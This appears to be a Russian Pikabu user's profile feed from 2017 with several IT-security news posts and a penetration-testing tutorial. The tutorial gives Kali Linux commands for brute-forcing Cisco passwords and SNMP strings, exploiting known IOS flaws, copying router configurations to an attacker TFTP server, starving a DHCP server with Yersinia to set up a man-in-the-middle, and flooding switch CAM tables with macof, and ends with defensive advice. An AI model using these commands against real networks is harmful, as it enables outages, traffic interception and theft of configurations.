kliMaster

kliMaster

https://vk.com/manchester0110
Пикабушник
Дата рождения: 13 октября 1988
user9128765 ждёт новые посты
поставил 793 плюса и 163 минуса
отредактировал 1 пост
проголосовал за 1 редактирование
Награды:
5 лет на Пикабу
64К рейтинг 769 подписчиков 71 подписка 298 постов 107 в горячем

В FreeBSD исправлена опасная уязвимость в ipfilter.

В FreeBSD исправлена опасная уязвимость в ipfilter. Freebsd, Уязвимость, Патч

Уязвимость позволяет удаленному пользователю осуществить DoS-атаку.


27 Апреля сообщество FreeBSD выпустило патч, устраняющий уязвимость удаленного отказа в обслуживании в реализации пакетного фильтра ipfilter(4) в FreeBSD. Уязвимости подвержены все поддерживаемые версии операционной системы – 10.0, 10.3 и 11.0. Скорее всего, проблема затрагивает и более старые релизы ОС.


Уязвимость вызвана утечкой памяти во время обработки фрагментированных пакетов при использовании встроенного пакетного фильтра ipfilter(4). Удаленный пользователь может отправить чреду специально сформированных пакетов уязвимой системе и вызвать утечку памяти, приводящую в последствии к перезагрузке системы.


Уязвимости подвержены все ОС, где используется ipfilter с правилами "keep state" или "keep frags".


Для устранения уязвимости пользователям рекомендуется установить исправление безопасности с сайта производителя с помощью утилиты freebsd-update(8), либо скачать патч по следующим ссылкам:


https://security.FreeBSD.org/patches/SA-17:04/ipfilter.patch


https://security.FreeBSD.org/patches/SA-17:04/ipfilter.patch...

Показать полностью

Грядут изменения в ФЗ РФ по ИБ.

Поручение Председателю Правительства Дмитрию Медведеву


В целях повышения информационной безопасности государственных информационных систем в Российской Федерации и защищённости персональных данных граждан Российской Федерации обеспечьте внесение изменений в федеральные законы, предусмотрев следующие принципы обработки данных в государственных информационных системах:


минимизацию состава обрабатываемых персональных данных, необходимых для решения возлагаемых на информационные системы задач;


обязательность учёта и регистрации всех действий и идентификации всех участников, связанных с обработкой персональных данных в информационных системах;


декларирование и согласование порядка обработки персональных данных с целями их обработки;


хранение персональных данных в электронном виде в информационных системах по месту возникновения таких данных;


определение межведомственного запроса как преимущественного способа получения в информационных системах сведений об объекте (субъекте).


Срок – до 1 декабря 2017 года.

http://kremlin.ru/acts/assignments/orders/54396
Показать полностью

Компания Mastercard выпустила биометрическую карточку с отпечатком пальца.

Компания Mastercard выпустила биометрическую карточку с отпечатком пальца. Банковская карта, Биометрика

Издание Engadget сообщает, что Mastercard выпустила биометрическую банковскую карточку, позволяющую подтверждать покупки прикосновением пальца к специальной зоне на карте, в которую вмонтирован биометрический датчик. Для того, чтобы карта могла считывать отпечаток, его нужно будет заверить в отделении банка. Если по каким-то причинам считывание отпечатка станет невозможным, клиенту будет предложено ввести пин код. Первые тесты биометрическая карта Mastercard прошли в Южной Африке, в одной из местных сетей супермаркетов и банком Absa. Пилотные запуски карты планируются в Европе и странах Азиатско-Тихоокеанского региона в ближайшее время.

https://www.engadget.com/2017/04/20/mastercard-biometric-fin...

Малварь три года оставалась незамеченной в Google Play и маскировалась под System Update.

Специалисты компании Zscaler обнаружили в Google Play очередную малварь. И хотя вредоносы проникают в официальный каталог приложений с завидной регулярностью, как правило, они не задерживаются там надолго, в конечном счете, их обнаруживают либо сторонние исследователи, либо сами инженеры Google. Однако приложение System Update – это определенно не такой случай.



Исследователи сообщают, что System Update относится к шпионскому семейству SMSVova, и вредонос продержался в Google Play рекордные три года, появившись еще в 2014 году. В результате приложение успели скачать 1 000 000 – 5 000 000 раз, невзирая даже на тот факт, что описание приложения ограничивалось пустым белым скриншотом и строкой текста: «это приложение обновит и активирует специализированные функции, связанные с местоположением».

Малварь три года оставалась незамеченной в Google Play и маскировалась под System Update. Вирус, Android, Длиннопост
Отзывы тоже нельзя было назвать положительными: большинство пользователей замечали подозрительное поведение System Update, потому как с их точки зрения приложение не делало ничего и попросту пропадало с экрана устройства сразу после первого запуска (не забыв продемонстрировать сообщение об ошибке).
Малварь три года оставалась незамеченной в Google Play и маскировалась под System Update. Вирус, Android, Длиннопост
Малварь три года оставалась незамеченной в Google Play и маскировалась под System Update. Вирус, Android, Длиннопост

Как уже было сказано выше, на самом деле это «системное обновление» представляло собой спайварь SMSVova. Во время первого запуска малварь активировала в фоновом режиме собственный Android-сервис и BroadcastReceiver, после чего шпионила за географическим местоположением пользователей, сохраняя эти данные в Shared Preferences.



Злоумышленники имели возможность наблюдать за входящими SMS-сообщениями через BroadcastReceiver, в частности, малварь искала в них строки vova- и get faq. Так, если атакующий присылал на скомпрометированный девайс сообщение с командой get faq, зараженное устройство отвечало списком команд, которые может выполнить. Все команды также передавались посредством SMS, с уже упомянутым префиксом vova-. К примеру: vova-set user password:’newpassword’.

Малварь три года оставалась незамеченной в Google Play и маскировалась под System Update. Вирус, Android, Длиннопост

Малварь могла сообщить своим операторам не только данные о местоположении пользователя, но и сменить пароль устройства. Зачем именно злоумышленникам понадобились данные о геолокации, исследователи не уточняют, но пишут, что такая информация может быть использована «во множестве вредоносных сценариев».



Изучив исходные коды вредоноса, исследователи Zscaler пришли к выводу, что, возможно, это ранняя версия малвари DroidJack RAT – одного из наиболее известных троянов удаленного доступа для Android. Напомню, что DroidJack RAT появился в том же 2014 году и был основан на легитимном приложении Sandroid, которое по-прежнему доступно в официальном каталоге.

Малварь три года оставалась незамеченной в Google Play и маскировалась под System Update. Вирус, Android, Длиннопост
Судя по тому, что приложение System Update не обновлялось с декабря 2014 года, а также принимая во внимание его сходство с DroidJack RAT, аналитики предполагают, что это была одна из первых, тестовых попыток злоумышленников, когда они только проверяли, как можно обойти фильтры Google Play и пробраться в каталог приложений.
https://xakep.ru/2017/04/21/so-much-faked-system-update/
Показать полностью 5

Атаки на сетевое оборудование с Kali Linux + рекомендации по защите.

Атаки на сетевое оборудование с Kali Linux + рекомендации по защите. Информационная безопасность, Взлом, Пентест, Yersinia, Cisco, Kali Linux, Длиннопост

Атакуем CISCO маршрутизатор


В состав Kali Linux входит несколько инструментов, которые можно использовать для аудита оборудования CISCO. Список можно посмотреть в разделе Vulnerability Analysis — Cisco Tools:

Атаки на сетевое оборудование с Kali Linux + рекомендации по защите. Информационная безопасность, Взлом, Пентест, Yersinia, Cisco, Kali Linux, Длиннопост

Cisco Audit Tool или CAT

Используется для брутфорса пароля при выключенном режиме aaa-mode, брутфорса SNMP community-строк и проверки на уязвимость IOS History bug (https://tools.cisco.com/security/center/content/CiscoSecurit...)


Пример использования:

CAT -h 192.168.1.209 -w /root/cisco/wordlist/snmpcommunities -a /root/cisco/wordlist/password_list -i

Атаки на сетевое оборудование с Kali Linux + рекомендации по защите. Информационная безопасность, Взлом, Пентест, Yersinia, Cisco, Kali Linux, Длиннопост

Cisco Global Exploiter или CGE

Используется для экслпутации известных уязвимостей. Нам доступно 14 атак:

Атаки на сетевое оборудование с Kali Linux + рекомендации по защите. Информационная безопасность, Взлом, Пентест, Yersinia, Cisco, Kali Linux, Длиннопост

Пример использования:

cge.pl 192.168.1.201 3

Атаки на сетевое оборудование с Kali Linux + рекомендации по защите. Информационная безопасность, Взлом, Пентест, Yersinia, Cisco, Kali Linux, Длиннопост

cisco-ocs

Инструмент для автоматизации поиска устройств со стандартными значениями пароля для telnet и режима enable, который может искать устройства в диапазоне адресов. Может использоваться при сканировании больших сетей.


Пример использования:

cisco-ocs 192.168.1.207 192.168.1.209

Атаки на сетевое оборудование с Kali Linux + рекомендации по защите. Информационная безопасность, Взлом, Пентест, Yersinia, Cisco, Kali Linux, Длиннопост

cisco-torch

Многофункциональный сканер уязвимостей для оборудования Cisco. Может сканировать несколько IP адресов за раз, подгружая из текстового файла. Запускать cisco-torch в Kali Linux следует, находясь в рабочей директории /usr/share/cisco-torch.


Пример использования:

Поиск доступных интерфейсов и протоколов и определение типа оборудования.

cisco-torch -A 192.168.1.201

Атаки на сетевое оборудование с Kali Linux + рекомендации по защите. Информационная безопасность, Взлом, Пентест, Yersinia, Cisco, Kali Linux, Длиннопост
Может использоваться для брутфорса паролей и SNMP community-строк.

cisco-torch -s -b 192.168.1.209

Для использования своего словаря, его нужно поместить в /usr/share/cisco-torch вместо файла password.txt

Атаки на сетевое оборудование с Kali Linux + рекомендации по защите. Информационная безопасность, Взлом, Пентест, Yersinia, Cisco, Kali Linux, Длиннопост

copy-router-config.pl и merge-copy-config.pl

Инструменты для загрузки текущей конфигурации маршрутизатора cisco при известной community-строке на свой tftp-сервер. В дальнейшем можно модифицировать конфигурацию и снова загрузить на сервер.


Пример использования:

copy-router-config.pl 192.168.1.201 192.168.1.3 private


Для автоматизации подобной атаки, где нас интересует только загрузка конфигурации на свой TFTP-сервер лучше воспользоваться модулем Metasploit auxiliary/scanner/snmp/cisco_config_tftp


Или NSE скриптом nmap snmp-ios-config.

Атакуем L2 протоколы
Атаки на сетевое оборудование с Kali Linux + рекомендации по защите. Информационная безопасность, Взлом, Пентест, Yersinia, Cisco, Kali Linux, Длиннопост

Yersinia — многофункциональный инструмент для атак на протоколы L2 (Data Link) уровня OSI.

Умеет проводить атаки на DHCP, STP, CDP, DTP, HSRP и другие.


Работать с Yersinia можно в нескольких режимах:


Запуск в режиме сервера и управление при помощи команд, похожих на cisco cli.

yersinia -D

telnet 127.0.0.1 12000


Логин и пароль root/root

Пароль для перехода в режим enable – tomac


1. Запуск в интерактивном режиме


yersinia -I

Атаки на сетевое оборудование с Kali Linux + рекомендации по защите. Информационная безопасность, Взлом, Пентест, Yersinia, Cisco, Kali Linux, Длиннопост
Опции управления доступны по нажатии на клавишу h:
Атаки на сетевое оборудование с Kali Linux + рекомендации по защите. Информационная безопасность, Взлом, Пентест, Yersinia, Cisco, Kali Linux, Длиннопост

Графический интерфейс GTK

Атаки на сетевое оборудование с Kali Linux + рекомендации по защите. Информационная безопасность, Взлом, Пентест, Yersinia, Cisco, Kali Linux, Длиннопост
Графический интерфейс может работать нестабильно. В режиме сервера не поддерживает некоторые виды атак, вроде DHCP Rogue server. Так что, основным режимом запуска можно считать интерактивный режим.


Атакуем DHCP сервер


В качестве примера продемонстрируем атаку на переполнение пула IP-адресов DHCP сервера. Данная атака может быть использована для выведения из строя корпоративного DHCP сервера и последующая его замещение поддельным, конфигудрация которого настроена таким образом, что весь трафик новых клиентов будет проходить через хост атакующего. Таким образом будет проведена одна из атак MitM.


На стороне атакующего можно выполнить скрипт nmap для обнаружения DHCP сервера в локальной сети.


nmap -n --script=broadcast-dhcp-discover

Атаки на сетевое оборудование с Kali Linux + рекомендации по защите. Информационная безопасность, Взлом, Пентест, Yersinia, Cisco, Kali Linux, Длиннопост
Теперь запускаем Yersinia в интерактивном режиме и переходим в режим DHCP выбрав его нажатием клавиши g.
Атаки на сетевое оборудование с Kali Linux + рекомендации по защите. Информационная безопасность, Взлом, Пентест, Yersinia, Cisco, Kali Linux, Длиннопост

Теперь в этом режиме будут видны все DHCP пакеты, полученные Yersinia.

Проверим список выданных адресов DHCP сервера до атаки:

Атаки на сетевое оборудование с Kali Linux + рекомендации по защите. Информационная безопасность, Взлом, Пентест, Yersinia, Cisco, Kali Linux, Длиннопост

Yersinia показывает DHCP пакеты, выловленные из сети:

Атаки на сетевое оборудование с Kali Linux + рекомендации по защите. Информационная безопасность, Взлом, Пентест, Yersinia, Cisco, Kali Linux, Длиннопост

Если выбрать пакет и нажать сочетание клавиш Shift+L то можно затем при помощи атаки RAW пересылать этот пакет в сеть, или модифицировать его при помощи нажатия клавиши e – переход в режим редактирования пакета.


При нажатии на клавишу x получаем список доступных атак:

Атаки на сетевое оборудование с Kali Linux + рекомендации по защите. Информационная безопасность, Взлом, Пентест, Yersinia, Cisco, Kali Linux, Длиннопост

Выбираем 1


Видим, что начинает отправлять огромное количество DHCP Discover запросов:

Атаки на сетевое оборудование с Kali Linux + рекомендации по защите. Информационная безопасность, Взлом, Пентест, Yersinia, Cisco, Kali Linux, Длиннопост

Через некоторое время можно остановить атаку нажатием на клавиши L и затем Enter:

Атаки на сетевое оборудование с Kali Linux + рекомендации по защите. Информационная безопасность, Взлом, Пентест, Yersinia, Cisco, Kali Linux, Длиннопост

Nmap больше не показывает доступных DHCP серверов в сети. Коропоративный DHCP сервер выведен из строя.

Атаки на сетевое оборудование с Kali Linux + рекомендации по защите. Информационная безопасность, Взлом, Пентест, Yersinia, Cisco, Kali Linux, Длиннопост

Проверим таблицу выданных IP-адресов на роутере:

Атаки на сетевое оборудование с Kali Linux + рекомендации по защите. Информационная безопасность, Взлом, Пентест, Yersinia, Cisco, Kali Linux, Длиннопост

Далее вы можете запустить атаку Rogue DHCP в Yersinia, либо при помощи модуля Metasploit или любым другим способом, чтобы провести MitM атаку.

Атаки на сетевое оборудование с Kali Linux + рекомендации по защите. Информационная безопасность, Взлом, Пентест, Yersinia, Cisco, Kali Linux, Длиннопост
Атаку на истощение пула IP адресов DHCP сервера можно так же провести при помощи инструмента DHCPig. При помощи Yersinia можно проводить атаки и на другие популярные протоколы, такие как STP (Spanning Tree Protocol) и HSRP (Hot Standby Router Protocol), которые так же позволят вам прослушивать трафик в сети.

Атака на переполнение CAM таблицы коммутатора.


Еще одна атака, которая переполняет CAM таблицу коммутатора, хранящую список MAC адресов, работающих на определенном порту. Некоторые коммутаторы при ее переполнении начинают работать как хабы, рассылая пакеты на все порты, тем самым создавая идеальные условия для проведения атак класса MitM.


В Kali Linux для проведения данной атаки присутствует инструмент macof


Пример использования:

macof -i eth0


Где eth0 – интерфейс, к которому подключен коммутатор для атаки.



Защита


Для защиты от подобного рода атак производителями используются различные, обычно проприетарные, технологии. На коммутаторах Cisco следует активировать DHCP Snooping и PortSecutiy во избежание атак на протокол DHCP и CAM Overflow. Для защиты от атак на HSRP и прочие протоколы используются другие технологии. Всегда нужно помнить, что дорогостоящее сетевое оборудование после правильной настройки может существенно повысить безопасность сетевой инфраструктуры, в то же время недонастроенное или настроенное неправильно может само стать инструментом в руках злоумышленника и угрозой безопасности. Выявление уязвимостей сетевого оборудования при проведении тестирования на проникновение и применение рекомендаций по результатам аудита помогает снизить риски взлома информационной системы злоумышленниками.

Огромная благодарность за предоставленный материал LukaSafonov

Показать полностью 21

Портала GoHa.Ru и компания Bethesda проводит эксклюзивную раздачу ключей в регионе СНГ.

Портала GoHa.Ru и компания Bethesda проводит эксклюзивную раздачу ключей в регионе СНГ. Гоха, Bethesda, Quake Champions

Ссылка на тему форума, где раздаю ключи http://forums.goha.ru/showthread_0_0_t1183364

P.S. времени не было самому проверить, отпишитесь жива ли ещё раздача.

Показать полностью

Павел Дуров обвинил Apple и Google в крупнейшем в истории мошенничестве.

Основатель «ВКонтакте» и создатель мессенджера Telegram Павел Дуров заявил, что Apple и Google «могут быть причастны к крупнейшему в истории человечества случаю мошенничества в отношении потребителей», так как читают записи и прослушивают звонки пользователей и передают их содержимое правоохранительным органам в различных странах.

Дуров рассказал о том, что в Telegram с недавних пор есть возможность осуществлять зашифрованные звонки, которые полностью конфиденциальны и безопасны. В отличие от других сервисов, которые передают данные правоохранителям.



«У Telegram исторически были проблемы с регуляторами в некоторых частях мира, потому что, в отличие от других сервисов, мы последовательно защищали частную жизнь наших пользователей и никогда не заключали сделок с правительствами. За три с половиной года существования Telegram передал ровно 0 байт информации пользователей третьим лицам», – сказа Дуров.


Бизнесмен пояснил, что именно по этим причинам в Саудовской Аравии трафик Telegram глушат, а в Китае, Омане и Иране сервис заблокирован. С другой стороны, такие сервисы, как WhatsApp, не имеют таких проблем в Китае, Саудовской Аравии, Иране и других странах с цензурой. Это происходит потому, что WhatsApp и Facebook торгуют доверием пользователей ради увеличения доли на рынке.



«Утверждение, что «WhatsApp и кто-либо еще не могут читать или прослушивать ваши сообщения и вызовы», абсолютно неверно. На самом деле WhatsApp может читать и прослушивать ваши звонки и сообщения, поскольку способен незаметно изменять ключи шифрования для 99,99% своих пользователей», – добавил Дуров.

По его словам, другие компании, такие как Apple и Google, имеют прямой доступ к истории переписок WhatsApp благодаря разрешению сторонних резервных копий. Так как компании вынуждены иметь дело с запросами на получение доступа к данным, эти сведения передаются дальше.



«Заявляя о своей безопасности, наши конкуренты могут быть причастны к крупнейшему в истории человечества случаю мошенничества в отношении потребителей», – сказал Дуров.

В Telegram используется сквозное шифрование и встроенное зашифрованное и распределенное облако для сообщений и мультимедиа. Соответствующие ключи дешифрования разделены на части и распределены по различным юрисдикциям, что делает данные пользователей в облаке более защищенными и безопасными, чем когда они хранятся у Google, Facebook или Apple.



«Неудивительно, что власти и регулирующие органы недовольны Telegram. Хорошо, пусть они блокируют нас, как они хотят. Мы не будем изменять нашим принципам и предавать наших пользователей. Я знаю, что не очень здорово, когда Telegram (или отдельные его сервисы) запрещен в вашей стране. Но иногда лучше полностью прекратить использование сервиса, чем продолжать использовать его, несмотря на подорванное доверие к безопасности», – заключил Дуров.
http://www.macdigger.ru/iphone-ipod/pavel-durov-obvinil-appl...


P.S. как считаете, это банальная конфронтация между конкурентами? Ведь аргументы, которые он приводит не лишены смысла.  Эх было бы здорово, если бы сапорт устроила нам пикабушникам, "пряму линию" с Павлухой.

Показать полностью

Занимательные задачи от "Образовач"

Занимательные задачи от "Образовач" Псевдонаука, Образовач

https://nplus1.ru/news/2016/04/26/astral-go-go?utm_source=ob...

Отличная работа, все прочитано!